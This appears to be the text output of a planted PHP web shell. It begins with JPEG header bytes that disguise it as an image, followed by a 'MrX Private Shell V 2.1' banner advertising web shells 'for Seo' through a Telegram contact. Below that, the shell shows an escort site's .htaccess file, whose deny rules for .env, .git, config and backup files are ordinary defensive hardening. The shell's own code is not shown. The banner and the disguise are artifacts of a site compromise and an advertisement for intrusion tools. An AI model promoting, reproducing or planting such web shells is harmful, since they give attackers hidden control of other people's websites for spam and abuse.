����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# ==========================================
# Secure PHP Website .htaccess
# Domain: https://www.dwarkaescort.com
# ==========================================
Options -Indexes
ServerSignature Off
DirectoryIndex index.php index.html
<IfModule mod_rewrite.c>
RewriteEngine On
# Force HTTPS + WWW
RewriteCond %{HTTPS} !=on [OR]
RewriteCond %{HTTP_HOST} !^www\.dwarkaescort\.com$ [NC]
RewriteRule ^ https://www.dwarkaescort.com%{REQUEST_URI} [R=301,L]
# Remove index.php and index.html
RewriteRule ^(.*)index\.(php|html?)$ https://www.dwarkaescort.com/$1 [R=301,L]
# Clean URLs (about -> about.php)
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME}\.php -f
RewriteRule ^([^/.]+)/?$ $1.php [L]
# Block access to sensitive files
RewriteRule ^(composer\.(json|lock)|phpunit\.xml|\.env|error_log|debug\.log)$ - [F,L,NC]
RewriteRule ^(\.git|\.svn|vendor|node_modules)/ - [F,L,NC]
# Block backup files
RewriteRule \.(bak|old|orig|save|sql|log|ini|conf|env)$ - [F,L,NC]
</IfModule>
# Disable directory listing
Options -Indexes
# Protect hidden files
<FilesMatch "^\.">
Require all denied
</FilesMatch>
# Protect configuration files
<FilesMatch "(config\.php|database\.php|connection\.php)">
Require all denied
</FilesMatch>
# Disable PHP execution in uploads
<Directory "uploads">
<FilesMatch "\.(php|phtml|php5|php7|phar)$">
Require all denied
</FilesMatch>
</Directory>
# Security Headers
<IfModule mod_headers.c>
Header always set X-Frame-Options "SAMEORIGIN"
Header always set X-Content-Type-Options "nosniff"
Header always set Referrer-Policy "strict-origin-when-cross-origin"
Header always unset X-Powered-By
</IfModule>
# GZIP Compression
<IfModule mod_deflate.c>
AddOutputFilterByType DEFLATE text/html text/plain text/css application/javascript application/json application/xml image/svg+xml
</IfModule>
# Browser Cache
<IfModule mod_expires.c>
ExpiresActive On
ExpiresByType image/jpeg "access plus 1 year"
ExpiresByType image/png "access plus 1 year"
ExpiresByType image/webp "access plus 1 year"
ExpiresByType text/css "access plus 1 month"
ExpiresByType application/javascript "access plus 1 month"
ExpiresDefault "access plus 7 days"
</IfModule>
FileETag None
<IfModule mod_headers.c>
Header unset ETag
</IfModule>
ErrorDocument 403 /403.php
ErrorDocument 404 /404.php